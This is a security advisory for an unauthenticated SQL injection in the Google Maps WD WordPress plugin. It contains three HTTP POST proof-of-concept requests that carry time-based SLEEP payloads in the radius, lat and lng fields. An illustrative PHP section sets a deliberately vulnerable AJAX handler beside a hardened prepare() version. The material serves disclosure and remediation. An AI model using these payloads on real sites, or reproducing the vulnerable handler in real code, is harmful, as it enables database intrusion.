The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Note: /2022/12/29/map/ is the page/post where Google_Maps_WD is embedded.
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km

POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km

POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km
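As an added illustration (not the plugin's own code), a hypothetical WordPress AJAX handler that concatenates radius, lat and lng straight into a distance query, beside a hardened version that coerces the values to numbers, allow-lists the unit and binds through $wpdb->prepare(). The function names, the haversine-style query shape and the lat/lng/published columns are assumptions.

```php
<?php
// Hypothetical handler, added for illustration; not the plugin's actual code.
// Registered on wp_ajax_nopriv_*, so it is reachable without logging in.
add_action( 'wp_ajax_nopriv_gmwd_example_nearby', 'gmwd_example_nearby_vulnerable' );

// Vulnerable pattern: raw request values are interpolated into the SQL text.
function gmwd_example_nearby_vulnerable() {
    global $wpdb;
    $radius = $_POST['radius'];
    $lat    = $_POST['lat'];
    $lng    = $_POST['lng'];
    $unit   = ( $_POST['distance_in'] === 'mi' ) ? 3959 : 6371; // earth radius
    // lat/lng land inside nested parentheses of the distance expression and
    // radius in the HAVING clause; none of them is quoted or type-checked,
    // which is the shape the time-based PoC requests above rely on.
    $sql = "SELECT T_MARKERS.*, ($unit * ACOS(COS(RADIANS($lat)) * COS(RADIANS(T_MARKERS.lat))"
         . " * COS(RADIANS(T_MARKERS.lng) - RADIANS($lng)) + SIN(RADIANS($lat))"
         . " * SIN(RADIANS(T_MARKERS.lat)))) AS distance"
         . " FROM {$wpdb->prefix}gmwd_markers AS T_MARKERS WHERE T_MARKERS.published = 1"
         . " HAVING distance < $radius";
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Hardened version: numeric coercion, range check, unit allow-list, prepare().
function gmwd_example_nearby_hardened() {
    global $wpdb;
    $radius = isset( $_POST['radius'] ) ? abs( floatval( $_POST['radius'] ) ) : 0.0;
    $lat    = isset( $_POST['lat'] ) ? floatval( $_POST['lat'] ) : 0.0;
    $lng    = isset( $_POST['lng'] ) ? floatval( $_POST['lng'] ) : 0.0;
    $unit   = ( isset( $_POST['distance_in'] ) && $_POST['distance_in'] === 'mi' ) ? 3959 : 6371;
    if ( $lat < -90 || $lat > 90 || $lng < -180 || $lng > 180 ) {
        wp_send_json_error( 'invalid coordinates', 400 );
    }
    // %d/%f placeholders are rendered as numeric literals, so whatever was
    // posted can only change the numbers, never the structure of the query.
    $sql = $wpdb->prepare(
        "SELECT T_MARKERS.*, (%d * ACOS(COS(RADIANS(%f)) * COS(RADIANS(T_MARKERS.lat))"
        . " * COS(RADIANS(T_MARKERS.lng) - RADIANS(%f)) + SIN(RADIANS(%f))"
        . " * SIN(RADIANS(T_MARKERS.lat)))) AS distance"
        . " FROM {$wpdb->prefix}gmwd_markers AS T_MARKERS WHERE T_MARKERS.published = 1"
        . " HAVING distance < %f",
        $unit, $lat, $lng, $lat, $radius
    );
    wp_send_json( $wpdb->get_results( $sql ) );
}
```

With the hardened handler, the PoC bodies above are reduced to the numeric prefix of each value (radius 1, lat 0.0, lng 0.0) and the SLEEP() subquery never reaches the database.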